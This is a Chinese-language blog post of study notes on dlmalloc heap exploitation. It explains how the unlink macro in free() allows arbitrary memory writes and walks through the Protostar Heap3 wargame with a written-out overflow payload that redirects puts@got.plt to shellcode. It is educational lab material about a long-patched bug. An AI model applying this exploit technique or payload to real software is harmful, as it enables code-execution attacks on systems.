Heap Exploit 學習筆記

berming
berming
Jul 23, 2017 · 13 min read
Image for post
Image for post

最近了解了一點有關Linux上malloc()的知識,懂得在基於Doug Lea Malloc的malloc實作上如何利用overflow來做到Heap Exploit,在此做個筆記整理。

以下是一個存在heap overflow風險的程式

mem = malloc(24);
gets(mem);
...
free(mem);

不像stack overflow,heap上不存在ret這種可以改變program flow的東西,所以頂多就是資料被覆寫,貌似風險不大,但事實上並非如此。


malloc所分配的記憶體單位為chunk,定義如下:

struct chunk {
int prev_size;
int size;
struct chunk *fd; // forward pointer
struct chunk *bk; // backward pointer
};

若已被分配的chunk不會用到後兩個pointer,直接用來存資料,但未分配的則會,也就是free chunks是用double linked-list串起來的。

Image for post
Image for post

但size總為8的倍數,於是最小的3 bits被拿來當作status bit,其中以LSB最重要,叫做PREV_INUSE,如同其字面意思,功用是紀錄上一個chunk是否為free。

來看看free()的實作,free()是chunk_free()的wrapper,較重要的部分如下(節錄至malloc.c-Doug Lea , 2001)

void
_int_free(mstate av, Void_t* mem)
{
mchunkptr p; /* chunk corresponding to mem */
INTERNAL_SIZE_T size; /* its size */
mfastbinptr* fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */
/* free(0) has no effect */
if (mem != 0) {
p = mem2chunk(mem);
size = chunksize(p);
check_inuse_chunk(av, p);  /*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/
if ((unsigned long)(size) <= (unsigned long)(av->max_fast)#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
p->fd = *fb;
*fb = p;
}
/*
Consolidate other non-mmapped chunks as they arrive.
*/
else if (!chunk_is_mmapped(p)) {
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);
assert(nextsize > 0);
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(p, bck, fwd);
}
if (nextchunk != av->top) {
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
/* consolidate forward */
if (!nextinuse) {
unlink(nextchunk, bck, fwd);
size += nextsize;
} else
clear_inuse_bit_at_offset(nextchunk, 0);
     /*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
     */
...

這裡重要的就是三個if condiction,第一個if是有關於fastbin,定義如下

/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE 80

用意是為了performance,可以稍微注意這個if內的程式,會發現只有fd而沒有bk,意思是小chunk(<80)不需勞煩用double linked-list連接,我們並不希望這個condiction成立,至於為什麼後面會提。

接著兩個if condiction-consolidate backwardconsolidate forward,是free用來找chunk的前後鄰居是否有free chunk可合併(合併chunk有助於performane呀),來看看consolidate forward的情況,大意如下

If forward chunk is free
  calculate merged chunk size
  If forward chunk is last_remainder
    ...
  Else
    unlink(next, bck, fwd)

重點在這個unlink,他是一個macro,定義如下

#define unlink(p, bck, fwd)                             
{
bck = p->bk;
fwd = p->fd;
fwd->bk = bck;
bck->fd = fwd;
}

做的事情很簡單,上面提到所有的free chunks(>80)是一個double linked-list結構,當兩個free chunks已經合併為一個了,那麼其中一個chunk node就用不到了,於是要把它移除。

Image for post
Image for post
(gray : before unlink , red : after unlink) The current chunk and next chunk (p) are merged, unlinked from its linked list, and then placed in unsorted chunk list

在這裡unlink所做的事總結兩行如下:

*(next->fd + 12) = next->bk

*(next->bk+ 8) = next->fd

等等,注意到什麼了嗎?由於存在overflow,以至於next chunk的資料是可控的,也就是next->fd和next->bk是可控的,這不就代表我們能夠在任意記憶體位址寫入資料了嗎!基本上可以這麼說,但還有個問題是(next->fd + 12)、(next->bk+ 8)必須都是writable address,否則會造成segfault,細節待實戰時再來討論。

但如果是上面所提到的fastbin就不會做unlink,這是exploit的關鍵,要避免這個情況,所以要注意所要free掉的chunk它的size。


exploit-exercises/Protostar — Heap3

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
void winner()
{
printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
char *a, *b, *c;
a = malloc(32);
b = malloc(32);
c = malloc(32);
strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);
free(c);
free(b);
free(a);
printf("dynamite failed?\n");
}

題目告訴我們是dlmalloc,所以直接朝這個方向想,第一眼看到時想到利用unlink() overwrite puts@got.plt by winner(),按照上面unlink兩條式子來建構payload。

p.s. printf只有字串參數時被最佳化為puts

*(puts@got.plt+12) = winner

*(winner+8)=puts@got.plt

但這作法明顯不行,winner在code segment無法寫入,那麼先寫入heap的位址,之後再想辦法跳到winner()去呢?試試看。

*(puts@got.plt+12) = shellcode (some heap address)

*(shellcode+8)=puts@got.plt

看起來行得通,但有個小小問題是shellcode的8~11bytes會被覆寫而無法使用,但這也簡單,在shellcode開頭設個jmp跳過去就是了。

OK,unlink的部分做完了,但似乎遺漏了一個更根本的問題,「unlink觸發的條件」,若要觸發consolidate backward,有幾個要點:

1. chunk size > MAX_FAST_SIZE (80)

2. 前一個chunk使用中 (PREV_INUSE is set)

3. 下一個chunk為free,也就是下下一個chunk的PREV_INUSE is clear

Image for post
Image for post
heap allocation for a, b, c

由於原先heap的三個chunks PREV_INUSE皆為set,所以必須要overwrite讓其unset,步驟為以下

  1. 從第二個chunk overwrite到第三個chunk的size field,unset PREV_INUSE。
  2. 偽造第四個chunk,只需要用到size field,功用是讓free()認為第三個chunk為free,也就unset第四個chunk size PREV_INUSE。
Image for post
Image for post
n is even number

size field中的0x65大於MAX_FAST_SIZE(80),且LSB is set,沒問題。

至於這個0x???????n是偽造的第四個chunk,那麼實際該填什麼呢?這裡注意一下,題目是用strcpy()來填heap的,所以不能夠有NULL byte!那麼這時可以填在size field的只剩兩種數字,

  1. 很大的數字,以至於每個byte都有值
  2. 負數

第一個明顯不能,heap沒那麼大可以爆,那麼就剩第二種-填負數。讓我們回去看看malloc.c consolidate forward那邊的程式

nextinuse = inuse_bit_at_offset(nextchunk, nextsize);/* consolidate forward */
if (!nextinuse) {
...

inuse_bit_at_offset是個macro,定義如下

/* check/set/clear inuse bits in known places */
#define inuse_bit_at_offset(p, s)\
(((mchunkptr)(((char*)(p)) + (s)))->size & PREV_INUSE)

注意到什麼了嗎?它並沒有做sign check,所以負數是可行的,那挑個方便的數字-4(0xfffffffc)使用,接下來就可以來建構payload了。

Image for post
Image for post
next_next_chunk’s PREV_INUSE is clear
./heap3 Shellcode\
`python -c 'print "A"*(32+4) + "\x65"'` \
`python -c 'print "C"*(100-8) + "\xfc\xff\xff\xff"*2 + \
"\x1c\xb1\x04\x08" + "\x08\xc0\x04\x08"'`

fd = puts@got.plt -12 = 0x0804b128 -12 = 0x0804b11c

bk = (chunk_1)+8 = 0x0804c000+8 = 0x0804c008

確認沒問題之後,就可以來建構shellcode了,剛好第一個chunk沒用到,理所當然的就放這邊吧,但之前提過第8~11byte無法使用,所以shellcode開頭必須做個小jmp跳過12bytes,之後接call winner()就可以囉。

Image for post
Image for post

以上所說的都是consolidate forward的作法,其實backward也大同小異,一些細節方面的不同而已,在此不再贅述。


在這次蒐集這篇文章的資料時學習了很多,雖然這個bug約莫十年前早已在glibc 2.3.3以後的版本修復了,但如今的malloc演算法仍與以前差不多,以前雖然設備不好,但演算法這種理論的東西早已證明那時的malloc做法是effective的,防護者的檢查仍要以效能為最主要考量。再找資料時發現了這句話可用來印證這件事情,在此分享-

for every protection there is an anti-protection.

http://liveoverflow.com/binary_hacking/protostar/heap3.html

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store